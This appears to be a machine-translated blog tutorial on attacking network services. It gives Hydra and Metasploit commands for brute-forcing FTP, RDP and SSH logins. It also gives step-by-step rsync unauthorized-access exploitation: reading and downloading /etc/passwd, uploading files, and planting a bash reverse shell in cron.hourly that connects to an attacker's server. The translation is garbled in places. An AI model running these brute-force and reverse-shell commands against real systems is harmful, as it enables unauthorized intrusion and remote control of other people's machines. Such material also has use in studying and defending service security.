当前位置:网站首页>Service Vulnerability & FTP & RDP & SSH & Rsync
Service Vulnerability & FTP & RDP & SSH & Rsync
2022-07-24 07:26:00 【Boring knowledge】

Service vulnerabilities
FTP
Password blasting tools for services
There are Hydra and beautiful young woman tools
Hydra and MSF
Personally, I prefer to use MSF
But both tools need to be understood
In the early stage, it must be port scanning
So which ports can be scanned specifically? You can scan for 3389.21.22.445 Etc. login port
Hydra
hydra IP ftp -l user name -P Password dictionary -t Threads ( Default 16) -vV
hydra IP ftp -l user name -P Password dictionary -e ns -vV
MSF
Start by opening MSF
Search for
search ftp_login

Then call the searched module
msf6 > use 0

Then check the contents that need to be configured
show options

The dictionary path is made by yourself

Configuration complete
Check it
See if there is any configuration error
show options
After checking that there are no problems
You can execute run Yes

Then log in remotely

RDP 3389
hydra ip rdp -L users.txt -P pass.txt -V

SSH
This is the case. , I also prefer to use MSF Medium SSH_login
search ssh_Login

Configuration information is and FTP Almost import account and password dictionary , Designated target ip
rsync Unauthorized access exploit ( port 873)
Judge :rsync rsync://xxx:873/
utilize :
- Read the file :rsync rsync://xxx:873/src/
- Download the file :rsync rsync://xxx:873/src/etc/passwd ./
- Upload files :rsync -av passwd rsync://xxx:873/src/tmp/passwd
rebound shell:
1、 pick up information :
rsync rsync://xxx:873/src/etc/crontab /root/cron.txt
2. create a file
touch shell
\#!/bin/bash
/bin/bash -i >& /dev/tcp/ Bounce to your server ip/5566 0>&1
chmod +x shell
3、 Upload files
rsync -av shell rsync://xxx:873/src/etc/cron.hourly
4、 Waiting to accept the rebound
边栏推荐
- Pytorch deep learning practice lesson 10 / assignment (basic CNN)
- 25.消息订阅与发布——PubSub-js
- numpy.inf
- Influxdb未授权访问&CouchDB权限绕过
- Wild pointer, null pointer, invalid pointer
- 【FreeRTOS】11 软件定时器
- django.db.utils. OperationalError: (2002, “Can‘t connect to local MySQL server through socket ‘/var/r
- Harbor2.2 用户角色权限速查
- Part II - C language improvement_ 2. Memory partition
- [introduction to C language] zzulioj 1011-1015
猜你喜欢

Chapter007 FPGA learning IIC bus EEPROM reading

Three implementation methods of single sign on

Deep learning two or three things - review those classical convolutional neural networks

QoS quality of service 4 traffic regulation of QoS boundary behavior

php链路日志方案

Learning strategies of 2D target detection overview (final chapter)

编译与调试(gcc,g++,gdb)

Jackson parsing JSON detailed tutorial

全国职业院校技能大赛网络安全B模块 Windows操作系统渗透测试

【FreeRTOS】11 软件定时器
随机推荐
使用堡垒机(跳板机)登录服务器
numpy.inf
二维平面多段线Y轴最短距离
Opencascade notes: GP package
Part II - C language improvement_ 2. Memory partition
[line test] Figure finding regular questions
Bookkeeping app: xiaoha bookkeeping 1 - production of welcome page
csdn,是时候说再见!
Nacos的高级部分
Filter 过滤器
OpenCascade笔记:gp包
numpy.arange
File “manage.py“, line 14 ) from exc ^ SyntaxError: invalid syntax出错的原因及解决方法
开发系统选择路线
[leetcode simple] 20. Valid brackets stack
从CIA看常见网络攻击(爆破,PE,流量攻击)
UNI-APP_小程序或h5页面背景音乐的播放与暂停
What kind of mode can make platform users self-help fission- Chain 2+1
Simple installation of sqli Labs
Pytorch deep learning practice lesson 10 / assignment (basic CNN)